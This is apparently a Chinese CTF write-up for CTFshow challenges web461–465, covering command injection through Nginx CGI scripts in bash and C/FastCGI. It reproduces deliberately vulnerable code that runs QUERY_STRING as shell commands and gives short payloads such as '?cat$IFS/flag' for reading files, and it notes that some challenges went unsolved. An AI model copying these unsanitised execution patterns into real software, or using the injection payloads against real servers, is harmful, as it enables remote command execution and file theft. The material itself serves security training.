环境模拟搭建:Nginx支持web界面执行bash|python等系统命令和脚本
web461
1
2
3
4
5
6
7
8
9
10
| #!/bin/bash
OIFS="$IFS"
IFS=","
set $QUERY_STRING
Args=($QUERY_STRING)
IFS="$OIFS"
if [ "${Args[2]}"ctf = "admin"ctf ]; then
echo "`${Args[0]}$IFS${Args[1]}`"
fi
exit 0
|
以逗号分割值,第三个值等于admin即可rce
?cat,/flag,admin
web462
1
2
3
4
5
6
7
8
9
10
11
| #!/bin/bash
OIFS="$IFS"
IFS=","
set $QUERY_STRING
Args=($QUERY_STRING)
IFS="$OIFS"
if [ "${Args[0]}"ctf = "ping"ctf ]; then
addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"
addr="ping -c 1 "$addr
$addr
fi
|
与上一题差不多,多了两个过滤
不过测试后发现不出网。。做不出来
https://www.reddit.com/r/securityCTF/comments/15stmxp/a_problem_about_linux_bashcgi_command_injection/?rdt=42831
web463
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| #include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>
int _System(const char * cmd, char *pRetMsg, int msg_len)
{
FILE * fp;
char * p = NULL;
int res = -1;
if (cmd == NULL || pRetMsg == NULL || msg_len < 0)
{
printf("Param Error!\n");
return -1;
}
if ((fp = popen(cmd, "r") ) == NULL)
{
printf("Popen Error!\n");
return -2;
}
else
{
memset(pRetMsg, 0, msg_len);
while(fgets(pRetMsg, msg_len, fp) != NULL)
{
printf("Msg:%s",pRetMsg);
}
if ( (res = pclose(fp)) == -1)
{
printf("close popenerror!\n");
return -3;
}
pRetMsg[strlen(pRetMsg)-1] = '\0';
return 0;
}
}
int main(void)
{
int count = 0;
char *cmd = "";
char a8Result[128] = {0};
int ret = 0;
while (FCGI_Accept() >= 0)
printf("Content-type: text/html\r\n"
"\r\n"
"<title>CTFshow</title>"
"<h1>where is flag?</h1>"
);
cmd=getenv("QUERY_STRING");
ret = _System(cmd, a8Result, sizeof(a8Result));
printf("ret = %d \nresult = %s\nlength = %d \n", ret, a8Result, strlen(a8Result));
return 0;
}
|
可以直接执行命令
?cat$IFS/flag
web464
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
| #include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>
int _System(const char * cmd, char *pRetMsg, int msg_len)
{
FILE * fp;
char * p = NULL;
int res = -1;
if (cmd == NULL || pRetMsg == NULL || msg_len < 0)
{
printf("Param Error!\n");
return -1;
}
if ((fp = popen(cmd, "r") ) == NULL)
{
printf("Popen Error!\n");
return -2;
}
else
{
memset(pRetMsg, 0, msg_len);
while(fgets(pRetMsg, msg_len, fp) != NULL)
{
printf("Msg:%s",pRetMsg);
}
if ( (res = pclose(fp)) == -1)
{
printf("close popenerror!\n");
return -3;
}
pRetMsg[strlen(pRetMsg)-1] = '\0';
return 0;
}
}
int main(void)
{
int count = 0;
char *cmd = "";
char a8Result[128] = {0};
int ret = 0;
while (FCGI_Accept() >= 0)
printf("Content-type: text/html\r\n"
"\r\n"
"<title>CTFshow</title>"
"<h1>where is flag?</h1>"
);
cmd=getenv("QUERY_STRING");
ret = _System(cmd, a8Result, sizeof(a8Result));
return 0;
}
|
与上一题相比少了输出,但是没什么区别
?cat$IFS/flag
web465
给了编译好的cgi文件
逆向发现在main中没有直接调用_System,猜测需要溢出到_System然后就可以执行命令
不过地址不确定,暂时做不出来